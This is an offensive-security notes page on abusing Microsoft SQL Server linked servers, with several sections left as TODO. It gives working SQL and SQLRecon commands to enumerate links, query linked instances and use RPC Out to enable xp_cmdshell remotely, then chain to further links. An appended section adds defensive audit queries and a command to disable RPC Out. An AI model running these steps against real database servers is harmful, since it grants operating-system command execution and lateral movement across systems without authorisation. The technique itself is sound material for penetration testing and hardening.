Links Abuse
Vulnerability
TODO: Describe the vulnerability here.
Prerequisites
- Having sysadmin rights on the Microsoft SQL instance.
Exploit
To enumerate links from your instance, use the query SELECT srvname, srvproduct, rpcout FROM master..sysservers;
or SQLRecon.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:links
To send a query to a linked instance, use SELECT * FROM OPENQUERY("$target", '$query');
or, again, SQLRecon.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:lquery /l:$target /c:"$query"
If RPC Out is enabled on the link, you can leverage it to enable xp_cmdshell on the linked instance with the following queries.
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [$target]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [$target]
You can also list any further links configured on your target and repeat the operation from there.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:llinks /l:$target
Useful links
- TODO: List links here.
Recommendations
- TODO: List recommendations here.
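The settings this page relies on (data access for OPENQUERY, RPC Out for EXEC ... AT, and the login each link maps to) can be audited on every instance with the catalog views below. This is an added example, not part of the original page; run it as a sysadmin so every mapping is visible. The link name in the final commented statement is a placeholder.

```sql
-- Added audit example (not from the original page).

-- 1. Linked servers and the two options the steps above depend on.
SELECT
    s.name                   AS link_name,
    s.product,
    s.provider,
    s.data_source,
    s.is_data_access_enabled,          -- needed for OPENQUERY against the link
    s.is_rpc_out_enabled,              -- needed for EXEC ('...') AT [link]
    s.modify_date
FROM sys.servers AS s
WHERE s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, s.name;

-- 2. Which remote identity each local login gets on each link.
--    uses_self_credential = 0 with a remote_name means every mapped caller
--    runs on the remote side as that fixed login; review its remote roles.
SELECT
    s.name AS link_name,
    CASE WHEN ll.local_principal_id = 0
         THEN '(default mapping: all other logins)'
         ELSE sp.name
    END    AS local_login,
    ll.uses_self_credential,
    ll.remote_name,
    ll.modify_date
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
    ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- 3. Current state of the options the EXEC ... AT statements change.
--    A value_in_use of 1 for xp_cmdshell that nobody requested is worth
--    investigating together with the link modify_date values above.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 4. Turning RPC Out off on a link that does not need it
--    (LINK_NAME_PLACEHOLDER is a placeholder, not a name from this page):
-- EXEC sp_serveroption @server = N'LINK_NAME_PLACEHOLDER',
--                      @optname = N'rpc out', @optvalue = N'false';
```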